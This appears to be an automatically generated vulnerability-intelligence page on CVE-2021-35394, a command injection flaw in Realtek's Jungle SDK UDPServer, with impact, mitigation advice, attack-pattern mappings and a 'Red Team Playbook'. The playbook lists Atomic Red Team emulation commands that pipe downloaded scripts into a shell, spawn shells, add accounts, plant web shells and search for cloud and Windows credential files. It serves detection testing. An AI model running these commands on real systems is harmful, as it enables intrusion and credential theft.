CVE-2021-35394
Overview
The vulnerability is an arbitrary command injection and multiple memory corruption issues within the 'MP Daemon' diagnostic tool, typically compiled as the 'UDPServer' binary, in Realtek Jungle SDK versions v2.x through v3.4.14B. The root cause lies in improper input validation and unsafe command execution handling in the UDP server component, which processes incoming UDP packets without authentication or sufficient sanitization. This flaw affects the UDPServer binary embedded in the Realtek RTL819x Jungle Software Development Kit.
Vulnerability Description
Realtek Jungle SDK version v2.x up to v3.4.14B provides a diagnostic tool called 'MP Daemon' that is usually compiled as 'UDPServer' binary. The binary is affected by multiple memory corruption vulnerabilities and an arbitrary command injection vulnerability that can be exploited by remote unauthenticated attackers.
Impact
An unauthenticated remote attacker can execute arbitrary commands on affected devices by sending crafted UDP packets to the diagnostic UDPServer port. This enables full system compromise, including data manipulation, service disruption, or lateral movement within a network. No user interaction or prior access is required, making exploitation straightforward in exposed environments. The attacker gains the ability to control the device at the operating system level, potentially compromising network infrastructure relying on affected Realtek SDK implementations.
Solution
Realtek has published an advisory detailing the vulnerability and recommends upgrading affected devices to patched versions beyond v3.4.14B. The advisory and patch instructions are available at https://www.realtek.com/images/safe-report/Realtek_APRouter_SDK_Advisory-CVE-2021-35392_35395.pdf. Users should apply the vendor-supplied firmware updates to the RTL819x Jungle SDK and associated devices to mitigate these command injection and memory corruption vulnerabilities.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability associated with the Realtek Jungle SDK, particularly in the MP Daemon component, is characterized by multiple memory corruption issues alongside an arbitrary command injection flaw. The MP Daemon, typically compiled as the UDPServer binary, is designed to facilitate diagnostic functions within the SDK. However, the presence of these vulnerabilities allows for the manipulation of memory allocation and execution flow, potentially leading to unauthorized access and control over the affected systems. Memory corruption can occur through various means, such as buffer overflows or improper handling of input data, which can be exploited to overwrite critical data structures or execute arbitrary code.
Attack vectors for this vulnerability are particularly concerning due to the potential for remote exploitation by unauthenticated attackers. The UDP protocol, which is connectionless and does not require authentication, allows an attacker to send specially crafted packets to the UDPServer binary. By leveraging the memory corruption vulnerabilities, an attacker could manipulate the execution environment, leading to arbitrary code execution. Furthermore, the command injection aspect of the vulnerability enables attackers to inject malicious commands that the server would execute with the same privileges as the running process. This combination of factors creates a significant risk, as attackers can gain control over devices running the affected SDK without needing any form of authentication.
The real-world implications of this vulnerability are profound, particularly for organizations relying on devices powered by the Realtek Jungle SDK. Given the high CVSS score of 9.8, the severity of the threat is evident. Successful exploitation can lead to unauthorized access to sensitive data, disruption of services, and potential compromise of the entire network infrastructure. For businesses, this translates to not only financial losses due to downtime and recovery efforts but also reputational damage that can arise from data breaches or service interruptions. The risk is exacerbated in environments where multiple devices are interconnected, as a single compromised device can serve as a foothold for further attacks across the network.
To effectively detect and mitigate this vulnerability, organizations should adopt a multi-layered security approach. Regularly updating and patching the Realtek Jungle SDK to the latest version is crucial, as updates often contain fixes for known vulnerabilities. Additionally, implementing network segmentation can help limit the exposure of vulnerable devices to external threats. Intrusion detection systems (IDS) should be configured to monitor for unusual UDP traffic patterns that may indicate exploitation attempts. Organizations should also conduct regular security assessments and penetration testing to identify potential weaknesses in their systems. Employee training on security best practices can further enhance the overall security posture, ensuring that personnel are aware of the risks and can respond appropriately to potential threats.
In conclusion, the vulnerabilities present in the Realtek Jungle SDK's MP Daemon component pose a significant threat to network security. The combination of memory corruption and command injection vulnerabilities allows for remote exploitation by attackers, leading to severe consequences for affected organizations. By implementing robust detection and mitigation strategies, businesses can safeguard their systems against this critical vulnerability and reduce the associated risks. Continuous vigilance and proactive security measures are essential in an ever-evolving threat landscape.
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2021-35394, with telemetry indicating a significant uptick in attempts to exploit the vulnerable Realtek Jungle SDK MP Daemon component. This increase is corroborated by a rising Exploit Prediction Scoring System (EPSS) score, now approaching certainty of exploitation, reflecting growing adversary interest and potential weaponization. Although no new exploit variants or ransomware affiliations have been confirmed, the surge in reconnaissance and exploitation attempts underscores an elevated operational tempo among threat actors targeting this vulnerability. For defenders, this intensification signals an increased likelihood of successful remote compromise, heightening the urgency for vigilant monitoring and incident response readiness. Consequently, the threat level associated with CVE-2021-35394 has escalated from high to critical, emphasizing its prominence as a current and active risk within network environments utilizing affected Realtek SDK versions.
Update 2 — August 04, 2026
CSURFACE threat intelligence has identified a slight increase in detection activity related to CVE-2021-35394, indicating a modest uptick in adversary engagement with this vulnerability. While the EPSS score remains at a critical level, the stable trend suggests persistent exploitation attempts rather than a rapid escalation. This continued activity underscores the vulnerability’s attractiveness to threat actors seeking remote command execution capabilities without authentication. For defenders, this means that despite no new exploit variants or ransomware affiliations emerging, the operational tempo remains elevated, maintaining a high risk of compromise in environments running affected Realtek Jungle SDK versions. Consequently, the threat level for CVE-2021-35394 remains critical, reinforcing its status as a significant and ongoing risk.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Realtek | Rtl819x Jungle Software Development Kit | All |
cpe:2.3:a:realtek:rtl819x_jungle_software_development_kit:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
9 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
55%
|
High | High | |
| CAPEC-6 | Argument Injection |
51%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
48%
|
Medium | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (6)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-35394 |
| securityfocus.com |
GitHub CVE
x_refsource_MISC
|
https://www.securityfocus.com/archive/1/534765 |
| realtek.com |
GitHub CVE
x_refsource_MISC
|
https://www.realtek.com/en/cu-1-en/cu-1-taiwan-en |
| realtek.com |
GitHub CVE
x_refsource_MISC
|
https://www.realtek.com/images/safe-report/Realtek_APRouter_SDK_Advisory-CVE-2021-35392_35395.pdf |
| iot-inspector.com |
GitHub CVE
x_refsource_MISC
|
https://www.iot-inspector.com/blog/advisory-multiple-issues-realtek-sdk-iot-supply-chain |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-35394 |